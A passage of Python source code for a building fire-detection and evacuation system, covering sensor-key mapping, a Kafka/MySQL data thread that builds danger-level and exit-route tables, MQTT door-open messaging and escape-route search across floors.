\"c3b4\":\n memory_map[142] = 1\n self.sensor_data[142][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2d90\":\n memory_map[143] = 1\n self.sensor_data[143][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2edc\":\n memory_map[144] = 1\n self.sensor_data[144][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e2b2\":\n memory_map[145] = 1\n self.sensor_data[145][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fda0\":\n memory_map[146] = 1\n self.sensor_data[146][0].append([timestamp_value, heat_value, status_value])\n # 406\n elif source_key_prefix == \"67d6\":\n memory_map[147] = 1\n self.sensor_data[147][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4d9a\":\n memory_map[148] = 1\n self.sensor_data[148][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f28a\":\n memory_map[149] = 1\n self.sensor_data[149][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"51d5\":\n memory_map[150] = 1\n self.sensor_data[150][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ae25\":\n memory_map[151] = 1\n self.sensor_data[151][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d04a\":\n memory_map[152] = 1\n self.sensor_data[152][0].append([timestamp_value, heat_value, status_value])\n # 153 gas\n # 407\n elif source_key_prefix == \"06b1\": # 4층 앞복도\n memory_map[154] = 1\n self.sensor_data[154][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"826e\": # 4층 복도\n memory_map[155] = 1\n self.sensor_data[155][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f11d\": # 4층 EV홀\n memory_map[156] = 1\n self.sensor_data[156][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ba9f\": # 4층 앞복도\n memory_map[157] = 1\n self.sensor_data[157][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b76b\": # 4층 계단\n memory_map[158] = 1\n self.sensor_data[158][0].append([timestamp_value, heat_value, status_value])\n # 공용부 부분\n elif source_key_prefix == \"ca19\":\n memory_map[159] = 1\n self.sensor_data[159][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6eee\":\n memory_map[160] = 1\n self.sensor_data[160][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"af9e\":\n memory_map[161] = 1\n self.sensor_data[161][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0a55\":\n memory_map[162] = 1\n self.sensor_data[162][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b5f1\":\n memory_map[163] = 1\n self.sensor_data[163][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6121\":\n memory_map[164] = 1\n self.sensor_data[164][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3ba8\":\n memory_map[165] = 1\n self.sensor_data[165][0].append([timestamp_value, heat_value, status_value])\n # 501\n elif source_key_prefix == \"f536\":\n memory_map[166] = 1\n self.sensor_data[166][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"92a8\":\n memory_map[167] = 1\n self.sensor_data[167][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"efc7\":\n memory_map[168] = 1\n self.sensor_data[168][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"eb6a\":\n memory_map[169] = 1\n self.sensor_data[169][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4044\":\n memory_map[170] = 1\n self.sensor_data[170][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e23e\":\n memory_map[171] = 1\n self.sensor_data[171][0].append([timestamp_value, heat_value, status_value])\n # 502\n elif source_key_prefix == \"b383\":\n memory_map[172] = 1\n self.sensor_data[172][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f995\":\n memory_map[173] = 1\n self.sensor_data[173][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d7e8\":\n memory_map[174] = 1\n self.sensor_data[174][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8932\":\n memory_map[175] = 1\n self.sensor_data[175][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8805\":\n memory_map[176] = 1\n self.sensor_data[176][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e9c0\":\n memory_map[177] = 1\n self.sensor_data[177][0].append([timestamp_value, heat_value, status_value])\n # 503\n elif source_key_prefix == \"a450\":\n memory_map[178] = 1\n self.sensor_data[178][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9958\":\n memory_map[179] = 1\n self.sensor_data[179][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f206\":\n memory_map[180] = 1\n self.sensor_data[180][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a721\":\n memory_map[181] = 1\n self.sensor_data[181][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b0b2\":\n memory_map[182] = 1\n self.sensor_data[182][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"abba\":\n memory_map[183] = 1\n self.sensor_data[183][0].append([timestamp_value, heat_value, status_value])\n # 504\n elif source_key_prefix == \"8e05\":\n memory_map[184] = 1\n self.sensor_data[184][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"793d\":\n memory_map[185] = 1\n self.sensor_data[185][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"977f\":\n memory_map[186] = 1\n self.sensor_data[186][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a3cf\":\n memory_map[187] = 1\n self.sensor_data[187][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d815\":\n memory_map[188] = 1\n self.sensor_data[188][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f855\":\n memory_map[189] = 1\n self.sensor_data[189][0].append([timestamp_value, heat_value, status_value])\n # 505\n elif source_key_prefix == \"7611\":\n memory_map[190] = 1\n self.sensor_data[190][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"96ec\":\n memory_map[191] = 1\n self.sensor_data[191][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4abc\":\n memory_map[192] = 1\n self.sensor_data[192][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7882\":\n memory_map[193] = 1\n self.sensor_data[193][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"612f\":\n memory_map[194] = 1\n self.sensor_data[194][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7773\":\n memory_map[195] = 1\n self.sensor_data[195][0].append([timestamp_value, heat_value, status_value])\n # 506\n elif source_key_prefix == \"6a0c\":\n memory_map[196] = 1\n self.sensor_data[196][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"11c5\":\n memory_map[197] = 1\n self.sensor_data[197][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9469\":\n memory_map[198] = 1\n self.sensor_data[198][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3437\":\n memory_map[199] = 1\n self.sensor_data[199][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fc31\": # g\n memory_map[200] = 1\n self.sensor_data[200][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4051\": # g\n memory_map[201] = 1\n self.sensor_data[201][0].append([timestamp_value, heat_value, status_value])\n # 202 = gas\n # 507 , 연기 추가\n # 203~ 209\n elif source_key_prefix == \"1d69\": # 5층 앞복도\n memory_map[203] = 1\n self.sensor_data[203][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3181\": # 5 층 복도\n memory_map[204] = 1\n self.sensor_data[204][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9dc3\": # EV홀\n memory_map[205] = 1\n self.sensor_data[205][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f118\": # 5층 앞복도\n memory_map[206] = 1\n self.sensor_data[206][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2db9\": # 5층 계단\n memory_map[207] = 1\n self.sensor_data[207][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5d26\": # EV\n memory_map[208] = 1\n self.sensor_data[208][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f4a0\": # 6층 계단\n memory_map[209] = 1\n self.sensor_data[209][0].append([timestamp_value, heat_value, status_value])\n\n # print(\"Source Key Prefix:\", source_key_prefix)\n # print(\"Timestamp Value:\", timestamp_value)\n # print(\"Heat Value:\", heat_value)\n # print(\"Status Value:\", status_value)\n\nclass db_thread(QThread):\n data_sig = pyqtSignal(object)\n end_sig = pyqtSignal(object)\n\n def __init__(self, shared_data):\n super().__init__()\n\n self.shared_data = shared_data\n\n self.head = [[], [], [], [], [], []]\n self.floor_idx_list = [[], [], [], [], [], []]\n self.temp_index = [[], [], [], [], [], []]\n self.gas_index = [[], [], [], [], [], []]\n\n self.IP = None\n self.Port = None\n self.ID = None\n self.PW = None\n self.DB_Name = None\n\n self.working = False\n self.connection = False\n self.db_connection = None\n self.speed = 1\n self.sensor_stack = 30\n self.floor_num = 4\n\n self.cur = None\n\n self.var_init()\n\n def var_init(self):\n idx_1F = [i for i in range(1, 12)]\n idx_2F = [i for i in range(12, 61)]\n idx_3F = [i for i in range(61, 110)]\n idx_4F = [i for i in range(110, 159)]\n idx_5F = [i for i in range(159, 208)]\n idx_6F = [i for i in range(208, 210)]\n self.floor_idx_list = [idx_1F, idx_2F, idx_3F, idx_4F, idx_5F, idx_6F]\n\n def init_DB(self):\n\n try:\n sql = 'CREATE DATABASE IF NOT EXISTS ' + self.DB_Name\n self.cur.execute(sql)\n except Exception as e:\n print(e)\n\n time.sleep(1)\n\n create_danger_level = \"CREATE TABLE IF NOT EXISTS danger_level(time SMALLINT(3) NOT NULL, `101` FLOAT default 0.0, `102` FLOAT default 0.0, `1-1` FLOAT default 0.0, `1-2` FLOAT default 0.0, `1-3` FLOAT default 0.0, \" \\\n \"`201` FLOAT default 0.0, `202` FLOAT default 0.0, `203` FLOAT default 0.0, `204` FLOAT default 0.0, `205` FLOAT default 0.0, `206` FLOAT default 0.0, `207` FLOAT default 0.0, \" \\\n \"`2-1` FLOAT default 0.0, `2-2` FLOAT default 0.0, `2-3` FLOAT default 0.0, `2-4` FLOAT default 0.0, \" \\\n \"`301` FLOAT default 0.0, `302` FLOAT default 0.0, `303` FLOAT default 0.0, `304` FLOAT default 0.0, `305` FLOAT default 0.0, `306` FLOAT default 0.0, `307` FLOAT default 0.0, \" \\\n \"`3-1` FLOAT default 0.0, `3-2` FLOAT default 0.0, `3-3` FLOAT default 0.0, `3-4` FLOAT default 0.0, \" \\\n \"`401` FLOAT default 0.0, `402` FLOAT default 0.0, `403` FLOAT default 0.0, `404` FLOAT default 0.0, `405` FLOAT default 0.0, `406` FLOAT default 0.0, `407` FLOAT default 0.0, \" \\\n \"`4-1` FLOAT default 0.0, `4-2` FLOAT default 0.0, `4-3` FLOAT default 0.0, `4-4` FLOAT default 0.0, \" \\\n \"`501` FLOAT default 0.0, `502` FLOAT default 0.0, `503` FLOAT default 0.0, `504` FLOAT default 0.0, `505` FLOAT default 0.0, `506` FLOAT default 0.0, `507` FLOAT default 0.0, \" \\\n \"`5-1` FLOAT default 0.0, `5-2` FLOAT default 0.0, `5-3` FLOAT default 0.0, `5-4` FLOAT default 0.0, \" \\\n \"PRIMARY KEY(time));\"\n create_exit_route = \"CREATE TABLE IF NOT EXISTS exit_route(time SMALLINT(3) NOT NULL, `101` TINYINT default 0, `102` TINYINT default 0, \" \\\n \"`201` TINYINT default 0, `202` TINYINT default 0, `203` TINYINT default 0, `204` TINYINT default 0, `205` TINYINT default 0, `206` TINYINT default 0, `207` TINYINT default 0, \" \\\n \"`301` TINYINT default 0, `302` TINYINT default 0, `303` TINYINT default 0, `304` TINYINT default 0, `305` TINYINT default 0, `306` TINYINT default 0, `307` TINYINT default 0, \" \\\n \"`401` TINYINT default 0, `402` TINYINT default 0, `403` TINYINT default 0, `404` TINYINT default 0, `405` TINYINT default 0, `406` TINYINT default 0, `407` TINYINT default 0, \" \\\n \"`501` TINYINT default 0, `502` TINYINT default 0, `503` TINYINT default 0, `504` TINYINT default 0, `505` TINYINT default 0, `506` TINYINT default 0, `507` TINYINT default 0, \" \\\n \"PRIMARY KEY(time));\"\n\n try:\n self.cur.execute(create_danger_level)\n except Exception as e:\n print(\"err create_danger_level: \", e)\n try:\n self.cur.execute(create_exit_route)\n except Exception as e:\n print(\"err create_exit_route: \", e)\n\n truccate_danger_level_sql = 'TRUNCATE TABLE danger_level;'\n truccate_exit_rout_sql = 'TRUNCATE TABLE exit_route;'\n try:\n self.cur.execute(truccate_danger_level_sql)\n except Exception as e:\n print(\"err truccate_danger_level_sql: \", e)\n try:\n self.cur.execute(truccate_exit_rout_sql)\n except Exception as e:\n print(\"err truccate_exit_rout_sql: \", e)\n\n danger_level_value = \"\"\n for _ in range(49):\n danger_level_value += \"0.0, \"\n danger_level_value = danger_level_value[:-2]\n\n insert_danger_level_1 = \"INSERT INTO danger_level VALUES\"\n insert_danger_level_2 = \"\"\n for i in range(61):\n insert_danger_level_2 += \"(\" + str(i) + \", \" + danger_level_value + \"), \"\n\n exit_route_value = \"\"\n for _ in range(30):\n exit_route_value += \"0, \"\n exit_route_value = exit_route_value[:-2]\n\n insert_exit_route_1 = \"INSERT INTO exit_route VALUES\"\n insert_exit_route_2 = \"\"\n for i in range(61):\n insert_exit_route_2 += \"(\" + str(i) + \", \" + exit_route_value + \"), \"\n\n try:\n self.cur.execute(insert_danger_level_1 + insert_danger_level_2[:-2] + \";\")\n except Exception as e:\n print(\"err insert_danger_level: \", e)\n try:\n self.cur.execute(insert_exit_route_1 + insert_exit_route_2[:-2] + \";\")\n except Exception as e:\n print(\"err insert_exit_route: \", e)\n\n def connect_DB(self):\n if not self.connection:\n try:\n self.db_connection = pymysql.connect(host=self.IP,\n port=int(self.Port),\n user=self.ID,\n password=self.PW,\n db=self.DB_Name,\n charset='utf8',\n autocommit=True,\n read_timeout=5,\n write_timeout=5,\n connect_timeout=5)\n self.cur = self.db_connection.cursor()\n self.init_DB()\n self.connection = True\n except Exception as err:\n print(err)\n else:\n try:\n self.db_connection.close()\n self.connection = False\n except Exception as err:\n print(err)\n\n def disconnect_DB(self):\n if self.connection:\n try:\n self.db_connection.close()\n self.connection = False\n\n except Exception as err:\n print(err)\n\n def list_split_per_floor(self, data, all_index):\n output = []\n for _ in range(len(all_index)):\n output.append([])\n for floor, idx_list in enumerate(all_index):\n for idx in idx_list:\n output[floor].append(data[idx])\n\n return output\n\n def run(self):\n self.connect_DB()\n if self.connection:\n # #region DB_version\n # sql = \"SELECT * FROM sensor_data;\"\n #\n # self.cur.execute(sql)\n # result = self.cur.fetchall()\n # self.disconnect_DB()\n #\n # head = list(result[0]).copy()\n # for idx, type in enumerate(head):\n # this_floor = 0\n # for floor, floor_nodes in enumerate(self.floor_idx_list):\n # if idx in floor_nodes:\n # this_floor = floor\n # if type == 'temp':\n # self.temp_index[this_floor].append(idx)\n # if type == 'gas':\n # self.gas_index[this_floor].append(idx)\n # self.head = [head[1:12], head[12:61], head[61:110], head[110:159], head[159:208], head[208:210]]\n #\n # total_datas = []\n #\n # for _ in range(self.sensor_stack):\n # frame_datas = [result[1][1:12], result[1][12:61], result[1][61:110], result[1][110:159],\n # result[1][159:208], result[1][208:210]]\n # total_datas.append([time.time()] + frame_datas)\n #\n # for data in result[1:]:\n # data = list(data)\n # if self.working:\n # frame_datas = [data[1:12], data[12:61], data[61:110], data[110:159], data[159:208], data[208:210]]\n # total_datas.pop(0)\n # total_datas.append([time.time()] + frame_datas)\n # self.data_sig.emit(total_datas)\n # time.sleep(self.speed / 1)\n # else:\n # break\n # endregion\n\n #reguin kafka_version\n data_str = \"0000 temp temp gas temp temp temp gas temp gas temp gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas temp temp temp temp gas gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas temp temp temp temp gas gas gas gas gas gas gas gas gas gas\"\n head = data_str.split()\n for idx, type in enumerate(head):\n this_floor = 0\n for floor, floor_nodes in enumerate(self.floor_idx_list):\n if idx in floor_nodes:\n this_floor = floor\n break\n if type == 'temp':\n self.temp_index[this_floor].append(idx)\n if type == 'gas':\n self.gas_index[this_floor].append(idx)\n self.head = [head[1:12], head[12:61], head[61:110], head[110:159], head[159:208], head[208:210]]\n\n total_datas = []\n mm_check = False\n while True:\n time.sleep(1)\n mm_check = self.shared_data.get_mm_check()\n if mm_check:\n result = self.shared_data.get_a()\n for i in range(210):\n result[i] = float(result[i])\n frame_datas = [result[1:12], result[12:61], result[61:110], result[110:159], result[159:208],\n result[208:210]]\n if len(total_datas) == 0:\n for _ in range(29):\n total_datas.append([time.time()] + frame_datas)\n elif len(total_datas) == 30:\n total_datas.pop(0)\n total_datas.append([time.time()] + frame_datas)\n\n if len(total_datas) == 30:\n if self.working:\n self.data_sig.emit(total_datas)\n\n\n else:\n print(len(total_datas), end='...')\n if (len(total_datas) == 29):\n print()\n self.end_sig.emit(True)\n self.quit()\n self.wait(2000)\n\n self.working = False\n #endregion\n\n\n\n\n\n\n\nclass get_data:\n\n def __init__(self, ui):\n super().__init__()\n self.ui = ui\n self.pd = None\n self.bg = None\n self.ad = None\n self.db_worker = None\n self.kafka_worker = None\n self.wc = None\n\n self.IP = None\n self.Port = None\n self.ID = None\n self.PW = None\n self.DB_Name = None\n\n self.last_exit_rout = []\n self.last_danger_level = []\n\n self.func_init()\n self.var_init()\n self.event_init()\n\n self.client = None\n self.mqtt_host = \"182.229.102.253\"# 원익 서버 주소\n self.mqtt_port = 1883\n self.sub_result = 10\n self.last_pub_time = time.time()\n\n self.mqtt_connection()\n\n def func_init(self):\n self.pd = plot_data(self.ui)\n self.bg = build_gl(self.ui.openGLWidget)\n self.bg.ui_init(self.ui)\n self.ad = analy_data(self.ui)\n self.wc = weight_checker()\n\n self.shared_data = SharedData()\n\n def var_init(self):\n # if use DB\n self.db_worker = db_thread(self.shared_data)\n\n #if use kafka\n self.kafka_worker = kafka_thread(self.shared_data)\n self.kafka_worker.start()\n\n self.set_default_param()\n\n def on_connect(self, client, userdata, flags, rc):\n if rc == 0:\n print(\"connected OK\")\n else:\n print(\"connected error\")\n\n def on_disconnect(self, cliecnt, userdata, flags, rc=0):\n if rc == 0:\n print(\"disconnected OK\")\n else:\n print(\"disconnected error\")\n\n def on_subscribe(self, client, userdata, mid, granted_qos):\n print(\"subscribe OK\")\n\n def on_message(self, client, userdata, msg):\n self.sub_doorOpenCall(msg)\n\n def mqtt_connection(self):\n try:\n self.client = mqtt.Client()\n self.client.on_connect = self.on_connect\n self.client.on_disconnect = self.on_disconnect\n self.client.on_subscribe = self.on_subscribe\n self.client.on_message = self.on_message\n\n self.client.connect(self.mqtt_host, self.mqtt_port)\n self.client.loop_start()\n self.client.subscribe(topic='/front/door/robot/fire/#', qos=1)\n except Exception as e:\n print(\"first MQTT connection error: \", str(e))\n\n def pub_doorOpenCall(self):\n topic = \"/front/door/robot/\" + \"fire\" + \"/door/open\"\n pub_data = json.dumps({\"id\": 0,\n \"block\": 0,\n \"building\": 0,\n \"unit\": 0,\n \"floor\": \"0\",\n \"type\": 0,\n })\n return topic, pub_data\n\n def sub_doorOpenCall(self, msg):\n sub_msg = json.loads(str(msg.payload.decode(\"utf-8\")))\n print(\"door open response (door -> AI)\")\n self.sub_result = sub_msg.get(\"result\")\n sub_result = self.sub_result\n return sub_result\n\n def resizeWidget(self):\n self.bg.resizeWidget(self.ui.openGLWidget.geometry())\n width = self.ui.log_tabWidget.geometry().width() - 6\n height = self.ui.log_tabWidget.geometry().height() - 25\n self.ui.system_log_table.setGeometry(QRect((width / 2.0) * 0.0, 0, width / 2.0 - 1, height))\n self.ui.analysis_log_table.setGeometry(QRect((width / 2.0) * 1.0, 0, width / 2.0 - 1, height))\n # self.ui.react_log_table.setGeometry(QRect((width / 2.0) * 2.0, 0, width / 2.0 - 1, height))\n self.ui.temp_data_log_table.setGeometry(QRect(0, 0, width, height))\n self.ui.gas_data_log_table.setGeometry(QRect(0, 0, width, height))\n\n def set_default_param(self):\n self.IP = self.ui.IP_Edit.text()\n self.Port = self.ui.PORT_Edit.text()\n self.ID = self.ui.ID_Edit.text()\n self.PW = self.ui.PW_Edit.text()\n self.DB_Name = self.ui.DBName_Edit.text()\n self.db_worker.IP = self.IP\n self.db_worker.Port = self.Port\n self.db_worker.ID = self.ID\n self.db_worker.PW = self.PW\n self.db_worker.DB_Name = self.DB_Name\n\n self.last_danger_level = []\n self.last_exit_rout = []\n for _ in range(61):\n default_danger_level = [[], [], [], [], []]\n default_exit_route = {}\n for floor in range(5):\n if floor == 0:\n for room in range(2):\n default_exit_route[str(floor + 1) + '0' + str(room + 1)] = 0\n for node in range(5):\n default_danger_level[floor].append(0.0)\n\n else:\n for room in range(7):\n default_exit_route[str(floor + 1) + '0' + str(room + 1)] = 0\n for node in range(11):\n default_danger_level[floor].append(0.0)\n self.last_danger_level.append(default_danger_level)\n self.last_exit_rout.append(default_exit_route)\n\n for floor in range(4):\n self.bg.scenario_data[floor]['index'] = -1\n self.bg.scenario_data[floor]['start_time'] = None\n self.bg.scenario_data[floor]['diff'] = -1\n self.bg.scenario_data[floor]['data'] = {}\n\n def event_init(self):\n self.db_worker.data_sig.connect(self.data_analy)\n self.db_worker.end_sig.connect(self.thread_end)\n\n def worker_start(self):\n if self.db_worker.isRunning():\n self.db_worker.working = False\n # self.db_worker.stop()\n else:\n self.set_default_param()\n self.db_worker.working = True\n self.db_worker.start()\n self.thread_event_set_ui()\n\n def thread_event_set_ui(self):\n if self.db_worker.working == True:\n self.ui.Start_Service_btn.setText(\"STOP\")\n self.system_log(\"TCP start\")\n if self.db_worker.working == False:\n self.ui.Start_Service_btn.setText(\"START\")\n self.system_log(\"TCP End\")\n\n def split_datas_sensor_type(self, head, datas):\n total_temp_datas = []\n total_gas_datas = []\n for data in datas:\n temp_datas = [[], [], [], [], [], []]\n gas_datas = [[], [], [], [], [], []]\n for floor, (types, values) in enumerate(zip(head, data[1:])):\n for type, value in zip(types, values):\n if type == 'temp':\n temp_datas[floor].append(value)\n elif type == 'gas':\n gas_datas[floor].append(float(value)*0.01)\n total_temp_datas.append([data[0]] + temp_datas)\n total_gas_datas.append([data[0]] + gas_datas)\n return total_temp_datas, total_gas_datas\n\n\n\n\n def update_danger_level_DB(self, time, danger_level):\n danger_level_sql = 'UPDATE danger_level SET '\n for floor, floor_danger_level in enumerate(danger_level):\n floor += 1\n for node, node_danger_level in enumerate(floor_danger_level):\n node += 1\n if floor == 1:\n if node <= 2:\n danger_level_sql += ('`' + str(floor) + '0' + str(node) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n danger_level_sql += ('`' + str(floor) + '-' + str(node - 2) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n if node <= 7:\n danger_level_sql += ('`' + str(floor) + '0' + str(node) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n else:\n danger_level_sql += ('`' + str(floor) + '-' + str(node - 7) + '` = ' + \"{:.1f}\".format(\n node_danger_level) + ', ')\n\n danger_level_sql = danger_level_sql[:-2] + ' WHERE time = ' + str(time) + ';'\n try:\n with pymysql.connect(host=self.IP, port=int(self.Port), user=self.ID, password=self.PW, db=self.DB_Name,\n charset='utf8', autocommit=True, read_timeout=5, write_timeout=5,\n connect_timeout=5) as conn:\n with conn.cursor() as cur:\n cur.execute(danger_level_sql)\n except Exception as e:\n print(e)\n\n def update_exit_rout_DB(self, time, exit_routes):\n exit_route_sql = 'UPDATE exit_route SET '\n for room in exit_routes.keys():\n exit_route_sql += ('`' + room + '` = ' + str(exit_routes[room]) + ', ')\n exit_route_sql = exit_route_sql[:-2] + ' WHERE time = ' + str(time) + ';'\n\n try:\n with pymysql.connect(host=self.IP, port=int(self.Port), user=self.ID, password=self.PW, db=self.DB_Name,\n charset='utf8', autocommit=True, read_timeout=5, write_timeout=5,\n connect_timeout=5) as conn:\n with conn.cursor() as cur:\n cur.execute(exit_route_sql)\n except Exception as e:\n print(e)\n\n def check_danger_level_changed(self, last_data, new_data):\n output = False\n for last_floor_data, new_floor_data in zip(last_data, new_data):\n for last_value, new_value in zip(last_floor_data, new_floor_data):\n if last_value != new_value:\n output = True\n return output\n\n def check_exit_route_changed(self, last_data, new_data):\n output = False\n\n for key in new_data.keys():\n if last_data[key] != new_data[key]:\n output = True\n\n return output\n\n def check_scenario_changed(self, last_data, new_data):\n output = False\n\n for floor, (last_index, new_index) in enumerate(zip(last_data, new_data)):\n if last_index != new_index:\n self.bg.scenario_data[floor]['index'] = new_data[floor]\n self.bg.load_scenario(floor)\n output = True\n\n return output\n\n def search_all_eixt_route(self, weight, watching=None):\n exit_routs = {}\n for floor in range(5):\n if floor == 0:\n for room in range(2):\n start_node = 'room' + str(floor) + str(room)\n path_route = self.bg.eva_draw.rs.search(weight, start_node)\n if path_route[-1] == 'escape00':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 0\n elif path_route[-1] == 'escape01':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 1\n\n if watching != None:\n if start_node == watching:\n self.bg.eva_draw.path_route = path_route\n else:\n for room in range(7):\n start_node = 'room' + str(floor) + str(room)\n path_route = self.bg.eva_draw.rs.search(weight, start_node)\n if path_route[-1] == 'escape00':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 0\n elif path_route[-1] == 'escape01':\n exit_routs[str(floor + 1) + '0' + str(room + 1)] = 1\n\n if watching != None:\n if start_node == watching:\n self.bg.eva_draw.path_route = path_route\n return exit_routs\n\n def data_analy(self, total_datas):\n try:\n #region get data\n temp_datas, gas_datas = self.split_datas_sensor_type(self.db_worker.head, total_datas)\n #endregion\n\n #region check Fire\n Fire_status, temp_idx, gas_idx = self.ad.check_danger(temp_datas, gas_datas)\n\n\n for floor, last, new in zip(range(5), self.bg.eva_draw.Fire, Fire_status):\n if (not last) and (new):\n if (floor >= 1) and (floor <= 4):\n self.bg.scenario_data[floor - 1]['start_time'] = int(time.time())\n min_time = time.time()\n for dif_floor in range(4):\n if (floor - 1) != dif_floor:\n if self.bg.scenario_data[dif_floor]['start_time'] is not None:\n if (self.bg.scenario_data[dif_floor]['start_time'] - min_time) <= 0:\n min_time = self.bg.scenario_data[dif_floor]['start_time']\n for dif_floor in range(4):\n if self.bg.scenario_data[dif_floor]['start_time'] is not None:\n self.bg.scenario_data[dif_floor]['diff'] = int(int(self.bg.scenario_data[dif_floor]['start_time'] - min_time) / 60.0)\n self.bg.eva_draw.Fire = Fire_status\n #endregion\n\n\n watching_node = None\n if self.bg.Watch_Present:\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n\n # region real time DB Update\n real_time = 0\n danger_level = []\n for floor in range(6):\n danger_level.append(self.bg.set_danger_level_Sensor(floor, self.db_worker.head[floor], total_datas[-1][floor + 1], self.bg.Watch_Present))\n\n\n danger_level_change = self.check_danger_level_changed(self.last_danger_level[real_time], danger_level)\n\n if danger_level_change:\n self.last_danger_level[real_time] = danger_level\n self.update_danger_level_DB(real_time, danger_level)\n\n self.wc.set_node_weight_useSensor(temp_idx, gas_idx, self.db_worker.temp_index, self.db_worker.gas_index)\n exit_routs = self.search_all_eixt_route(self.wc.node, watching_node)\n\n exit_rout_change = self.check_exit_route_changed(self.last_exit_rout[real_time], exit_routs)\n if exit_rout_change:\n self.last_exit_rout[real_time] = exit_routs\n self.update_exit_rout_DB(real_time, exit_routs)\n\n\n # endregion\n\n if True in self.bg.eva_draw.Fire:\n\n # current_time = time.time()\n # if self.sub_result == 0:\n # if current_time - self.last_pub_time >= 60:\n # topic, pub_data = self.pub_doorOpenCall()\n # self.client.publish(topic, pub_data)\n # self.last_pub_time = current_time # pub한 시간을 갱신\n # else:\n # print(\"already\")\n # else:\n # topic, pub_data = self.pub_doorOpenCall()\n # self.client.publish(topic, pub_data)\n # ��동문 제어 end\n\n\n scenario_idx = self.ad.check_scenario(self.bg.eva_draw.Fire, temp_datas, gas_datas)\n change_scenario = self.check_scenario_changed([floor_data['index'] for floor_data in self.bg.scenario_data], scenario_idx)\n\n # region future DB Update\n\n floor_idx = [[0, 47], [47, 94], [94, 141], [141, 188]]\n if change_scenario:\n for minute in range(1, 61):\n layer_height_data = [3.0 for _ in range(188)]\n watching_node = None\n set = False\n if not self.bg.Watch_Present:\n if minute == self.bg.time_gap:\n watching_node = 'room' + str(self.bg.eva_draw.Start_floor) + str(self.bg.eva_draw.Start_room)\n set = True\n\n danger_level = []\n for floor in range(5):\n data = []\n if floor != 0:\n if self.bg.scenario_data[floor - 1]['index'] != -1:\n search_time = minute - self.bg.scenario_data[floor - 1]['diff'] + 1\n if search_time >= 60:\n search_time = 60\n elif search_time <= 1:\n search_time = 1\n data 